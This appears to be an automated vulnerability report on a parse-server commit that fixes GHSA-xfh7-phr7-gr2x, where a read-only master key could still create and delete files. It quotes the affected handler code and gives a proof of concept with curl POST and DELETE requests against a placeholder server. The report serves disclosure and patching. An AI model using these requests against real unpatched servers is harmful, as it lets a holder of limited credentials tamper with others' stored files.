Potential Security Vulnerability Detected
Repository: parse-community/parse-server
Commit: 036365a
Author: Manuel
Date: 2026-03-05T01:45:53Z
Commit Message
fix: File creation and deletion bypasses `readOnlyMasterKey` write restriction ([GHSA-xfh7-phr7-gr2x](https://github.com/parse-community/parse-server/security/advisories/GHSA-xfh7-phr7-gr2x)) (#10095)
Pull Request
PR: #10095 - fix: File creation and deletion bypasses readOnlyMasterKey write restriction (GHSA-xfh7-phr7-gr2x)
Labels: state:released-alpha
Description:
Pull Request
Issue
File creation and deletion bypasses `readOnlyMasterKey` write restriction ([GHSA-xfh7-phr7-gr2x](https://github.com/parse-community/parse-server/security/advisories/GHSA-xfh7-phr7-gr2x))
Analysis
Vulnerability Type: Privilege Escalation
Severity: High
Description
Before the patch, the readOnlyMasterKey was intended to restrict all write operations, but file creation and deletion operations bypassed this restriction. This allowed an attacker with a read-only master key to create and delete files, effectively escalating privileges beyond intended access controls. The patch adds explicit checks to block file creation and deletion requests when authenticated with a read-only master key, enforcing the expected write restrictions.
Affected Code
```javascript
async createHandler(req, res, next) {
  // No check for readOnlyMasterKey; allowed file creation
  const config = req.config;
  const user = req.auth.user;
  const isMaster = req.auth.isMaster;
  ...
}

async deleteHandler(req, res, next) {
  // No check for readOnlyMasterKey; allowed file deletion
  const { filesController } = req.config;
  const filename = FilesRouter._getFilenameFromParams(req);
  ...
}
```
Proof of Concept
1. Use the readOnlyMasterKey to send a POST request to create a file:

```shell
curl -X POST \
  -H "X-Parse-Application-Id: yourAppId" \
  -H "X-Parse-Master-Key: readOnlyMasterKey" \
  -H "Content-Type: text/plain" \
  --data-binary "file content" \
  https://your-parse-server/files/readonly-create-exploit.txt
```

Expected behavior before patch: the file is created despite the readOnlyMasterKey being read-only.

2. Use the readOnlyMasterKey to send a DELETE request to delete the file:

```shell
curl -X DELETE \
  -H "X-Parse-Application-Id: yourAppId" \
  -H "X-Parse-Master-Key: readOnlyMasterKey" \
  https://your-parse-server/files/readonly-create-exploit.txt
```

Expected behavior before patch: the file is deleted despite the readOnlyMasterKey being read-only.
This demonstrates privilege escalation by bypassing intended write restrictions of the readOnlyMasterKey.
This issue was automatically created by Vulnerability Spoiler Alert.
Detected at: 2026-03-05T06:01:20.257Z